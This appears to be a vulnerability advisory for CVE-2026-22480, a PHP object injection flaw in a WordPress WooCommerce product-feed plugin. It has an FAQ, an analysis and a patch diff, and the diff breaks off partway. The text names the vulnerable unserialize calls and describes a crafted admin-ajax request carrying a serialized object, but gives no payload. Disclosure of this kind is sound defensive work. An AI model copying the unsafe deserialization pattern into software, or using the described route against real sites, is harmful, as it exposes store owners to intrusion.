What is CVE-2026-22480?

CVE-2026-22480 is a PHP Object Injection vulnerability in the WebToffee WooCommerce Product Feeds plugin for WordPress, affecting versions up to 2.3.3. It allows authenticated users with shop manager-level access to inject arbitrary PHP objects through unsafe deserialization of user input.

How does the vulnerability work?

The vulnerability arises from the deserialization of untrusted input from the ‘form_data’ parameter in AJAX requests. Attackers can send crafted requests that include serialized objects, potentially leading to code execution if a suitable gadget chain exists in the environment.

Who is affected by this vulnerability?

Any WordPress site using the WebToffee WooCommerce Product Feeds plugin version 2.3.3 or earlier is at risk. Specifically, authenticated users with shop manager or higher privileges can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WebToffee Product Feeds plugin installed. If it is version 2.3.3 or earlier, your site is susceptible to CVE-2026-22480.

How can I fix this vulnerability?

The vulnerability is patched in version 2.3.4 of the WebToffee Product Feeds plugin. Update your plugin to the latest version to mitigate this issue and ensure that unsafe deserialization is no longer possible.

What does the CVSS score of 6.6 indicate?

A CVSS score of 6.6 is classified as medium severity. This indicates that while the vulnerability requires authenticated access to exploit, it poses a significant risk if combined with other vulnerabilities that allow for a successful attack.

What is a PHP Object Injection?

PHP Object Injection occurs when an application deserializes untrusted data, allowing an attacker to manipulate the application’s object state. This can lead to various attacks, including arbitrary file deletion or remote code execution, depending on the application’s context.

What is a proof of concept for this vulnerability?

A proof of concept (PoC) demonstrates how an attacker can exploit CVE-2026-22480 by sending a crafted AJAX request with a malicious serialized object payload. This PoC illustrates the vulnerability’s potential impact in a controlled environment.

What precautions should I take after patching?

After updating the plugin, review user access levels and ensure that only necessary users have shop manager privileges. Regularly audit your WordPress plugins and themes for vulnerabilities and apply security best practices.

Are there any known exploits for this vulnerability?

As of now, there are no publicly known exploits specifically targeting CVE-2026-22480. However, the potential for exploitation exists if an attacker identifies a suitable gadget chain in the environment.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WebToffee Product Feeds plugin until a patch can be applied. Additionally, restrict access to the WordPress admin area to trusted users only.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-22480: WebToffee WooCommerce Product Feeds – Google Shopping, Pinterest, TikTok Ads, & More <= 2.3.3 – Authenticated (Shop manager+) PHP Object Injection (webtoffee-product-feed)

CVE ID CVE-2026-22480

Plugin webtoffee-product-feed

Severity Medium (CVSS 6.6)

CWE 502

Vulnerable Version 2.3.3

Patched Version 2.3.4

Disclosed March 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22480:
The vulnerability is a PHP object injection flaw in the WebToffee WooCommerce Product Feeds plugin for WordPress. The root cause is the unsafe deserialization of user-controlled input from the `$_POST[‘form_data’]` parameter. In the vulnerable plugin versions (<=2.3.3), multiple AJAX handler functions pass this parameter directly to `maybe_unserialize(wp_unslash(…))`. This function deserializes the input without validation, allowing an attacker to inject arbitrary PHP objects.

The exploitation method requires an authenticated attacker with shop manager or higher privileges. The attack vector targets the plugin's AJAX endpoints, specifically the `wt_product_feed` AJAX actions handled in `/wp-admin/admin-ajax.php`. The vulnerable code paths are in `admin/modules/cron/cron.php` lines 1122 and 1362, `admin/modules/export/classes/class-export-ajax.php` lines 196, 306, and 673, and `helpers/class-wt-common-helper.php` where the `process_formdata` method is called.

An attacker can send a crafted POST request to `/wp-admin/admin-ajax.php` with `action` set to one of the plugin's AJAX handlers (e.g., `wt_product_feed_export_ajax`) and a malicious serialized object in the `form_data` parameter. The payload would contain a serialized PHP object that, when deserialized, triggers a POP (Property-Oriented Programming) chain if a suitable gadget chain exists in the target environment.

The patch replaces the unsafe `maybe_unserialize(wp_unslash(…))` call with a new `wt_decode_data` method. This new method appears to implement safe data decoding, likely using JSON decoding or another non-PHP serialization format. The fix is applied consistently across all vulnerable locations, ensuring that user-supplied `form_data` is never passed to PHP's unserialize function.

If exploited successfully, this vulnerability allows authenticated attackers to perform PHP object injection. While no known POP chain exists within the vulnerable plugin itself, the presence of compatible gadget chains in other installed plugins or themes could lead to arbitrary file deletion, sensitive data retrieval, or remote code execution. The CVSS score of 6.6 reflects the requirement for shop manager privileges and the need for external POP chains to achieve maximum impact.

Differential between vulnerable and patched code

Code Diff

--- a/webtoffee-product-feed/admin/modules/cron/cron.php
+++ b/webtoffee-product-feed/admin/modules/cron/cron.php
@@ -1119,7 +1119,9 @@
 		}

 		/* process form data */
-		$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+		$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+		/* process form data */
+		$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

 		/* loading export module class object */
 		$this->module_obj=Webtoffee_Product_Feed_Sync::load_modules($action_type);
@@ -1359,7 +1361,9 @@
         $cron_form_details = maybe_unserialize($cron_details['data']);

         /* process form data */
-        $form_data = (isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+		$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+		/* process form data */
+		$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

         /* loading export module class object */
         $this->module_obj = Webtoffee_Product_Feed_Sync::load_modules($action_type);
--- a/webtoffee-product-feed/admin/modules/export/classes/class-export-ajax.php
+++ b/webtoffee-product-feed/admin/modules/export/classes/class-export-ajax.php
@@ -193,7 +193,10 @@
 		if( 0 == $offset ) /* first batch */
 		{
 			/* process form data */
-			$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+			$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+			/* process form data */
+			$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);
+
 			//sanitize form data
 			$form_data=Wt_Pf_IE_Basic_Helper::sanitize_formdata($form_data, $this->export_obj);

@@ -300,8 +303,10 @@

 			$tb=$wpdb->prefix. Webtoffee_Product_Feed_Sync::$template_tb;

+			/* decode data */
+			$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
 			/* process form data */
-			$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+			$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

 			//sanitize form data
 			$form_data=Wt_Pf_IE_Basic_Helper::sanitize_formdata($form_data, $this->export_obj);
@@ -666,7 +671,9 @@
 		$template_data=$this->get_mapping_template_by_id($id);
 		if($template_data)
 		{
-			$decoded_form_data=Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize($template_data['data']));
+			$decoded_form_data = isset( $template_data['data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $template_data['data'] ) : array(); //phpcs:ignore
+			/* process form data */
+			$decoded_form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($decoded_form_data);
 			$this->selected_template_form_data=(!is_array($decoded_form_data) ? array() : $decoded_form_data);
 		}
 	}
--- a/webtoffee-product-feed/helpers/class-wt-common-helper.php
+++ b/webtoffee-product-feed/helpers/class-wt-common-helper.php
@@ -1,683 +1,830 @@
 <?php
 if(!class_exists('Webtoffee_Product_Feed_Sync_Common_Helper')){
-class Webtoffee_Product_Feed_Sync_Common_Helper
-{
-
-    public static $min_version_msg='';
-
-   /**
-   *  Check the minimum base version required for post type modules
-   *
-   */
-    public static function check_base_version($post_type, $post_type_title, $min_version)
-    {
-        $warn_icon='<span class="dashicons dashicons-warning"></span> ';
-        if(!version_compare(WEBTOFFEE_PRODUCT_FEED_SYNC_VERSION, $min_version, '>=')) /* not matching the min version */
-        {
-            // translators: %1$s is the post type title, %2$s is the plugin name, %3$s is the minimum version, %4$s is the plugin name again
-            self::$min_version_msg.=$warn_icon.sprintf(esc_html__("The %1$s requires a minimum version of %2$s %3$s. Please upgrade the %4$s accordingly.", 'webtoffee-product-feed'), "<b>$post_type_title</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>", "<b>v$min_version</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>").'<br />';
-            add_action('admin_notices', array(__CLASS__, 'no_minimum_base_version') );
-            return false;
-        }
-        return true;
-    }
-
-    /**
-    *
-    *   No minimum version error message
-    */
-    public static function no_minimum_base_version()
-    {
-        ?>
-        <div class="notice notice-warning">
-            <p>
-                <?php
-                echo wp_kses_post( self::$min_version_msg );
-                ?>
-            </p>
-        </div>
-        <?php
-    }
-
-		/**
-	 * Gets the product categories.
-	 *
-	 * @return array
-	 */
-	public static function get_product_categories($slugged=false) {
-
-                $out = array();
-                $category_args = [
-                            'taxonomy'		 => 'product_cat',
-                            'orderby'		 => 'term_group',
-                            'title_li'		 => '',
-                            'hide_empty'	 => 1,
-                ];
-                $product_categories = get_categories( $category_args );
-                if (!is_wp_error($product_categories)) {
-                    foreach ($product_categories as $category) {
-                            $out[$category->term_id] =  array(
-                                    'slug' => $category->slug,
-                                    'name' => $category->name
-                                );
-                    }
-                }
-                return $out;
-	}
-
-
-	/**
-	 * Local Attribute List to map product value with merchant attributes
-	 *
-	 * @param string $selected
-	 *
-	 * @return string
-	 */
-	public static function attribute_dropdown( $export_channel, $selected = '' ) {
-
-		$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_attributes_v11' );
-
-		if ( false === $attribute_dropdown ) {
-			$attributes = array(
-				'id'                        => esc_attr__( 'Product Id', 'webtoffee-product-feed' ),
-				'title'                     => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
-                                'parent_title'              => esc_attr__( 'Parent Title', 'webtoffee-product-feed' ),
-				'description'               => esc_attr__( 'Product Description', 'webtoffee-product-feed' ),
-				'short_description'         => esc_attr__( 'Product Short Description', 'webtoffee-product-feed' ),
-                                'parent_description'        => esc_attr__( 'Parent Description', 'webtoffee-product-feed' ),
-				'product_type'              => esc_attr__( 'Product Local Category', 'webtoffee-product-feed' ),
-				'link'                      => esc_attr__( 'Product URL', 'webtoffee-product-feed' ),
-				'ex_link'                   => esc_attr__( 'External Product URL', 'webtoffee-product-feed' ),
-				'condition'                 => esc_attr__( 'Condition', 'webtoffee-product-feed' ),
-				'item_group_id'             => esc_attr__( 'Parent Id [Group Id]', 'webtoffee-product-feed' ),
-				'sku'                       => esc_attr__( 'SKU', 'webtoffee-product-feed' ),
-				'sku_id'                    => esc_attr__( 'SKU+ID[sku_id]', 'webtoffee-product-feed' ),
-				'parent_sku'                => esc_attr__( 'Parent SKU', 'webtoffee-product-feed' ),
-				'availability'              => esc_attr__( 'Availability', 'webtoffee-product-feed' ),
-                                'availability_date'         => esc_attr__( 'Availability date', 'webtoffee-product-feed' ),
-				'quantity'                  => esc_attr__( 'Quantity', 'webtoffee-product-feed' ),
-				'price'                     => esc_attr__( 'Regular Price', 'webtoffee-product-feed' ),
-				'current_price'             => esc_attr__( 'Price', 'webtoffee-product-feed' ),
-				'sale_price'                => esc_attr__( 'Sale Price', 'webtoffee-product-feed' ),
-				'price_with_tax'            => esc_attr__( 'Regular Price With Tax', 'webtoffee-product-feed' ),
-				'current_price_with_tax'    => esc_attr__( 'Price With Tax', 'webtoffee-product-feed' ),
-				'sale_price_with_tax'       => esc_attr__( 'Sale Price With Tax', 'webtoffee-product-feed' ),
-				'sale_price_sdate'          => esc_attr__( 'Sale Start Date', 'webtoffee-product-feed' ),
-				'sale_price_edate'          => esc_attr__( 'Sale End Date', 'webtoffee-product-feed' ),
-				'weight'                    => esc_attr__( 'Weight', 'webtoffee-product-feed' ),
-                                'weightnunit'               => esc_attr__( 'Weight+Unit', 'webtoffee-product-feed' ),
-				'width'                     => esc_attr__( 'Width', 'webtoffee-product-feed' ),
-                                'widthnunit'                => esc_attr__( 'Width+Unit', 'webtoffee-product-feed' ),
-				'height'                    => esc_attr__( 'Height', 'webtoffee-product-feed' ),
-                                'heightnunit'               => esc_attr__( 'Height+Unit', 'webtoffee-product-feed' ),
-				'length'                    => esc_attr__( 'Length', 'webtoffee-product-feed' ),
-                                'lengthnunit'               => esc_attr__( 'Length+Unit', 'webtoffee-product-feed' ),
-				'shipping_class'            => esc_attr__( 'Shipping Class', 'webtoffee-product-feed' ),
-				'type'                      => esc_attr__( 'Product Type', 'webtoffee-product-feed' ),
-				'variation_type'            => esc_attr__( 'Variation Type', 'webtoffee-product-feed' ),
-				'visibility'                => esc_attr__( 'Visibility', 'webtoffee-product-feed' ),
-				'rating_total'              => esc_attr__( 'Total Rating', 'webtoffee-product-feed' ),
-				'rating_average'            => esc_attr__( 'Average Rating', 'webtoffee-product-feed' ),
-				'tags'                      => esc_attr__( 'Tags', 'webtoffee-product-feed' ),
-				'sale_price_effective_date' => esc_attr__( 'Sale Price Effective Date', 'webtoffee-product-feed' ),
-				'is_bundle'                 => esc_attr__( 'Is Bundle', 'webtoffee-product-feed' ),
-				'author_name'               => esc_attr__( 'Author Name', 'webtoffee-product-feed' ),
-				'author_email'              => esc_attr__( 'Author Email', 'webtoffee-product-feed' ),
-				'date_created'              => esc_attr__( 'Date Created', 'webtoffee-product-feed' ),
-				'date_updated'              => esc_attr__( 'Date Updated', 'webtoffee-product-feed' ),
-				'identifier_exists'         => esc_attr__( 'Identifier Exists', 'webtoffee-product-feed' ),
-                                'promotion_id'              => esc_attr__( 'Product Id / Promotion Id', 'webtoffee-product-feed' ),
-                                'long_title'                => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
-                                'promotion_effective_dates' => esc_attr__( 'Promotion effective dates', 'webtoffee-product-feed' ),
-
-                                // PriceRunner fields
-                                'ProductId' => 'Product Id[ProductId]',
-                                'ProductName' => 'Product Title[ProductName]',
-                                'Description' => 'Product Description[Description]',
-                                'Url' => 'Product URL[Url]',
-                                'Category' => 'Product Categories[Category] ',
-                                'ImageUrl' => 'Main Image[ImageUrl]',
-                                'Condition' => 'Condition[condition]',
-                                'checkout_link_template' => 'checkout_link_template',
-                                'Price' => 'Price[Price]',
-                                'ShippingCost' => 'ShippingCost[ShippingCost]',
-                                'StockStatus' => 'StockStatus[StockStatus]',
-                                'LeadTime' => 'LeadTime[LeadTime]',
-                                'Brand' => 'Brand[Brand]',
-                                'Msku' => 'Msku[Msku]',
-                                'Ean' => 'Ean[Ean]',
-                                'AdultContent' => 'AdultContent[AdultContent]',
-                                'AgeGroup' => 'AgeGroup[AgeGroup]',
-                                'Bundled' => 'Bundled[Bundled]',
-                                'Multipack' => 'Multipack[Multipack]',
-                                'Pattern' => 'Pattern[Pattern]',
-                                'Size' => 'Size[Size]',
-                                'SizeSystem' => 'SizeSystem[SizeSystem]',
-                                'Color' => 'Color[Color]',
-                                'EnergyEfficiencyClass' => 'EnergyEfficiencyClass[EnergyEfficiencyClass]',
-                                'Gender' => 'Gender[Gender]',
-                                'Material' => 'Material[Material]',
-                                'GroupId' => 'GroupId[GroupId]',
-								'fb_override' => 'Facebook Override',
+	class Webtoffee_Product_Feed_Sync_Common_Helper
+	{
+
+		public static $min_version_msg='';

-			);
-			$images     = array(
-				'image_link'    => esc_attr__( 'Main Image', 'webtoffee-product-feed' ),
-				'feature_image' => esc_attr__( 'Featured Image', 'webtoffee-product-feed' ),
-				'additional_image_link'        => esc_attr__( 'Images [Comma Separated]', 'webtoffee-product-feed' ),
-				'wtimages_1'       => esc_attr__( 'Additional Image 1', 'webtoffee-product-feed' ),
-				'wtimages_2'       => esc_attr__( 'Additional Image 2', 'webtoffee-product-feed' ),
-				'wtimages_3'       => esc_attr__( 'Additional Image 3', 'webtoffee-product-feed' ),
-				'wtimages_4'       => esc_attr__( 'Additional Image 4', 'webtoffee-product-feed' ),
-				'wtimages_5'       => esc_attr__( 'Additional Image 5', 'webtoffee-product-feed' ),
-				'wtimages_6'       => esc_attr__( 'Additional Image 6', 'webtoffee-product-feed' ),
-				'wtimages_7'       => esc_attr__( 'Additional Image 7', 'webtoffee-product-feed' ),
-				'wtimages_8'       => esc_attr__( 'Additional Image 8', 'webtoffee-product-feed' ),
-				'wtimages_9'       => esc_attr__( 'Additional Image 9', 'webtoffee-product-feed' ),
-				'wtimages_10'      => esc_attr__( 'Additional Image 10', 'webtoffee-product-feed' ),
-			);
-
-			$attribute_dropdown = '<option></option>';
-			$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Constant', 'webtoffee-product-feed' ) );
-			$attribute_dropdown .= sprintf( '<option style="font-weight: bold;" value="%s">%s</option>', 'wt-static-map-vl', esc_attr__( 'Static value', 'webtoffee-product-feed' ) );
-			$attribute_dropdown .= '</optgroup>';
-
-			if ( is_array( $attributes ) && ! empty( $attributes ) ) {
-				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Primary Attributes', 'webtoffee-product-feed' ) );
-				foreach ( $attributes as $key => $value ) {
-					$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
-				}
-				$attribute_dropdown .= '</optgroup>';
-			}
-
-			if ( is_array( $images ) && ! empty( $images ) ) {
-				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Image Attributes', 'webtoffee-product-feed' ) );
-				foreach ( $images as $key => $value ) {
-					$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
-				}
-				$attribute_dropdown .= '</optgroup>';
+		/**
+		 *  Check the minimum base version required for post type modules
+		 *
+		 */
+		public static function check_base_version($post_type, $post_type_title, $min_version)
+		{
+			$warn_icon='<span class="dashicons dashicons-warning"></span> ';
+			if(!version_compare(WEBTOFFEE_PRODUCT_FEED_SYNC_VERSION, $min_version, '>=')) /* not matching the min version */
+			{
+				// translators: %1$s is the post type title, %2$s is the plugin name, %3$s is the minimum version, %4$s is the plugin name again
+				self::$min_version_msg.=$warn_icon.sprintf(esc_html__("The %1$s requires a minimum version of %2$s %3$s. Please upgrade the %4$s accordingly.", 'webtoffee-product-feed'), "<b>$post_type_title</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>", "<b>v$min_version</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>").'<br />';
+				add_action('admin_notices', array(__CLASS__, 'no_minimum_base_version') );
+				return false;
 			}
-
-			$meta_in_mapping = apply_filters('wt_pf_allow_meta_in_mapping', true);
-			if($meta_in_mapping){
-				$product_metas = self::get_product_metakeys();
-				if ( is_array( $product_metas ) && ! empty( $product_metas ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Custom Fields/Post Meta', 'webtoffee-product-feed' ) );
-					foreach ( $product_metas as $key => $value ) {
+			return true;
+		}
+
+		/**
+		*
+		*   No minimum version error message
+		*/
+		public static function no_minimum_base_version()
+		{
+			?>
+			<div class="notice notice-warning">
+				<p>
+					<?php
+					echo wp_kses_post( self::$min_version_msg );
+					?>
+				</p>
+			</div>
+			<?php
+		}
+
+			/**
+		 * Gets the product categories.
+		 *
+		 * @return array
+		 */
+		public static function get_product_categories($slugged=false) {
+
+					$out = array();
+					$category_args = [
+								'taxonomy'		 => 'product_cat',
+								'orderby'		 => 'term_group',
+								'title_li'		 => '',
+								'hide_empty'	 => 1,
+					];
+					$product_categories = get_categories( $category_args );
+					if (!is_wp_error($product_categories)) {
+						foreach ($product_categories as $category) {
+								$out[$category->term_id] =  array(
+										'slug' => $category->slug,
+										'name' => $category->name
+									);
+						}
+					}
+					return $out;
+		}
+
+
+		/**
+		 * Local Attribute List to map product value with merchant attributes
+		 *
+		 * @param string $selected
+		 *
+		 * @return string
+		 */
+		public static function attribute_dropdown( $export_channel, $selected = '' ) {
+
+			$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_attributes_v11' );
+
+			if ( false === $attribute_dropdown ) {
+				$attributes = array(
+					'id'                        => esc_attr__( 'Product Id', 'webtoffee-product-feed' ),
+					'title'                     => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
+									'parent_title'              => esc_attr__( 'Parent Title', 'webtoffee-product-feed' ),
+					'description'               => esc_attr__( 'Product Description', 'webtoffee-product-feed' ),
+					'short_description'         => esc_attr__( 'Product Short Description', 'webtoffee-product-feed' ),
+									'parent_description'        => esc_attr__( 'Parent Description', 'webtoffee-product-feed' ),
+					'product_type'              => esc_attr__( 'Product Local Category', 'webtoffee-product-feed' ),
+					'link'                      => esc_attr__( 'Product URL', 'webtoffee-product-feed' ),
+					'ex_link'                   => esc_attr__( 'External Product URL', 'webtoffee-product-feed' ),
+					'condition'                 => esc_attr__( 'Condition', 'webtoffee-product-feed' ),
+					'item_group_id'             => esc_attr__( 'Parent Id [Group Id]', 'webtoffee-product-feed' ),
+					'sku'                       => esc_attr__( 'SKU', 'webtoffee-product-feed' ),
+					'sku_id'                    => esc_attr__( 'SKU+ID[sku_id]', 'webtoffee-product-feed' ),
+					'parent_sku'                => esc_attr__( 'Parent SKU', 'webtoffee-product-feed' ),
+					'availability'              => esc_attr__( 'Availability', 'webtoffee-product-feed' ),
+									'availability_date'         => esc_attr__( 'Availability date', 'webtoffee-product-feed' ),
+					'quantity'                  => esc_attr__( 'Quantity', 'webtoffee-product-feed' ),
+					'price'                     => esc_attr__( 'Regular Price', 'webtoffee-product-feed' ),
+					'current_price'             => esc_attr__( 'Price', 'webtoffee-product-feed' ),
+					'sale_price'                => esc_attr__( 'Sale Price', 'webtoffee-product-feed' ),
+					'price_with_tax'            => esc_attr__( 'Regular Price With Tax', 'webtoffee-product-feed' ),
+					'current_price_with_tax'    => esc_attr__( 'Price With Tax', 'webtoffee-product-feed' ),
+					'sale_price_with_tax'       => esc_attr__( 'Sale Price With Tax', 'webtoffee-product-feed' ),
+					'sale_price_sdate'          => esc_attr__( 'Sale Start Date', 'webtoffee-product-feed' ),
+					'sale_price_edate'          => esc_attr__( 'Sale End Date', 'webtoffee-product-feed' ),
+					'weight'                    => esc_attr__( 'Weight', 'webtoffee-product-feed' ),
+									'weightnunit'               => esc_attr__( 'Weight+Unit', 'webtoffee-product-feed' ),
+					'width'                     => esc_attr__( 'Width', 'webtoffee-product-feed' ),
+									'widthnunit'                => esc_attr__( 'Width+Unit', 'webtoffee-product-feed' ),
+					'height'                    => esc_attr__( 'Height', 'webtoffee-product-feed' ),
+									'heightnunit'               => esc_attr__( 'Height+Unit', 'webtoffee-product-feed' ),
+					'length'                    => esc_attr__( 'Length', 'webtoffee-product-feed' ),
+									'lengthnunit'               => esc_attr__( 'Length+Unit', 'webtoffee-product-feed' ),
+					'shipping_class'            => esc_attr__( 'Shipping Class', 'webtoffee-product-feed' ),
+					'type'                      => esc_attr__( 'Product Type', 'webtoffee-product-feed' ),
+					'variation_type'            => esc_attr__( 'Variation Type', 'webtoffee-product-feed' ),
+					'visibility'                => esc_attr__( 'Visibility', 'webtoffee-product-feed' ),
+					'rating_total'              => esc_attr__( 'Total Rating', 'webtoffee-product-feed' ),
+					'rating_average'            => esc_attr__( 'Average Rating', 'webtoffee-product-feed' ),
+					'tags'                      => esc_attr__( 'Tags', 'webtoffee-product-feed' ),
+					'sale_price_effective_date' => esc_attr__( 'Sale Price Effective Date', 'webtoffee-product-feed' ),
+					'is_bundle'                 => esc_attr__( 'Is Bundle', 'webtoffee-product-feed' ),
+					'author_name'               => esc_attr__( 'Author Name', 'webtoffee-product-feed' ),
+					'author_email'              => esc_attr__( 'Author Email', 'webtoffee-product-feed' ),
+					'date_created'              => esc_attr__( 'Date Created', 'webtoffee-product-feed' ),
+					'date_updated'              => esc_attr__( 'Date Updated', 'webtoffee-product-feed' ),
+					'identifier_exists'         => esc_attr__( 'Identifier Exists', 'webtoffee-product-feed' ),
+									'promotion_id'              => esc_attr__( 'Product Id / Promotion Id', 'webtoffee-product-feed' ),
+									'long_title'                => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
+									'promotion_effective_dates' => esc_attr__( 'Promotion effective dates', 'webtoffee-product-feed' ),
+
+									// PriceRunner fields
+									'ProductId' => 'Product Id[ProductId]',
+									'ProductName' => 'Product Title[ProductName]',
+									'Description' => 'Product Description[Description]',
+									'Url' => 'Product URL[Url]',
+									'Category' => 'Product Categories[Category] ',
+									'ImageUrl' => 'Main Image[ImageUrl]',
+									'Condition' => 'Condition[condition]',
+									'checkout_link_template' => 'checkout_link_template',
+									'Price' => 'Price[Price]',
+									'ShippingCost' => 'ShippingCost[ShippingCost]',
+									'StockStatus' => 'StockStatus[StockStatus]',
+									'LeadTime' => 'LeadTime[LeadTime]',
+									'Brand' => 'Brand[Brand]',
+									'Msku' => 'Msku[Msku]',
+									'Ean' => 'Ean[Ean]',
+									'AdultContent' => 'AdultContent[AdultContent]',
+									'AgeGroup' => 'AgeGroup[AgeGroup]',
+									'Bundled' => 'Bundled[Bundled]',
+									'Multipack' => 'Multipack[Multipack]',
+									'Pattern' => 'Pattern[Pattern]',
+									'Size' => 'Size[Size]',
+									'SizeSystem' => 'SizeSystem[SizeSystem]',
+									'Color' => 'Color[Color]',
+									'EnergyEfficiencyClass' => 'EnergyEfficiencyClass[EnergyEfficiencyClass]',
+									'Gender' => 'Gender[Gender]',
+									'Material' => 'Material[Material]',
+									'GroupId' => 'GroupId[GroupId]',
+									'fb_override' => 'Facebook Override',
+
+				);
+				$images     = array(
+					'image_link'    => esc_attr__( 'Main Image', 'webtoffee-product-feed' ),
+					'feature_image' => esc_attr__( 'Featured Image', 'webtoffee-product-feed' ),
+					'additional_image_link'        => esc_attr__( 'Images [Comma Separated]', 'webtoffee-product-feed' ),
+					'wtimages_1'       => esc_attr__( 'Additional Image 1', 'webtoffee-product-feed' ),
+					'wtimages_2'       => esc_attr__( 'Additional Image 2', 'webtoffee-product-feed' ),
+					'wtimages_3'       => esc_attr__( 'Additional Image 3', 'webtoffee-product-feed' ),
+					'wtimages_4'       => esc_attr__( 'Additional Image 4', 'webtoffee-product-feed' ),
+					'wtimages_5'       => esc_attr__( 'Additional Image 5', 'webtoffee-product-feed' ),
+					'wtimages_6'       => esc_attr__( 'Additional Image 6', 'webtoffee-product-feed' ),
+					'wtimages_7'       => esc_attr__( 'Additional Image 7', 'webtoffee-product-feed' ),
+					'wtimages_8'       => esc_attr__( 'Additional Image 8', 'webtoffee-product-feed' ),
+					'wtimages_9'       => esc_attr__( 'Additional Image 9', 'webtoffee-product-feed' ),
+					'wtimages_10'      => esc_attr__( 'Additional Image 10', 'webtoffee-product-feed' ),
+				);
+
+				$attribute_dropdown = '<option></option>';
+				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Constant', 'webtoffee-product-feed' ) );
+				$attribute_dropdown .= sprintf( '<option style="font-weight: bold;" value="%s">%s</option>', 'wt-static-map-vl', esc_attr__( 'Static value', 'webtoffee-product-feed' ) );
+				$attribute_dropdown .= '</optgroup>';
+
+				if ( is_array( $attributes ) && ! empty( $attributes ) ) {
+					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Primary Attributes', 'webtoffee-product-feed' ) );
+					foreach ( $attributes as $key => $value ) {
 						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
 					}
 					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			$global_in_mapping = apply_filters('wt_pf_allow_global_attr_in_mapping', true);
-			if($global_in_mapping){
-				$product_global_attrs = self::get_global_attributes();
-				if ( is_array( $product_global_attrs ) && ! empty( $product_global_attrs ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Attributes', 'webtoffee-product-feed' ) );
-					foreach ( $product_global_attrs as $key => $value ) {
+
+				if ( is_array( $images ) && ! empty( $images ) ) {
+					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Image Attributes', 'webtoffee-product-feed' ) );
+					foreach ( $images as $key => $value ) {
 						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
 					}
 					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			$local_in_mapping = apply_filters('wt_pf_allow_local_attr_in_mapping', true);
-			if($local_in_mapping){
-				$product_local_attrs = self::get_local_attributes();
-				if ( is_array( $product_local_attrs ) && ! empty( $product_local_attrs ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Custom Attributes', 'webtoffee-product-feed' ) );
-					foreach ( $product_local_attrs as $key => $value ) {
-						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+
+				$meta_in_mapping = apply_filters('wt_pf_allow_meta_in_mapping', true);
+				if($meta_in_mapping){
+					$product_metas = self::get_product_metakeys();
+					if ( is_array( $product_metas ) && ! empty( $product_metas ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Custom Fields/Post Meta', 'webtoffee-product-feed' ) );
+						foreach ( $product_metas as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
+					}
+				}
+
+				$global_in_mapping = apply_filters('wt_pf_allow_global_attr_in_mapping', true);
+				if($global_in_mapping){
+					$product_global_attrs = self::get_global_attributes();
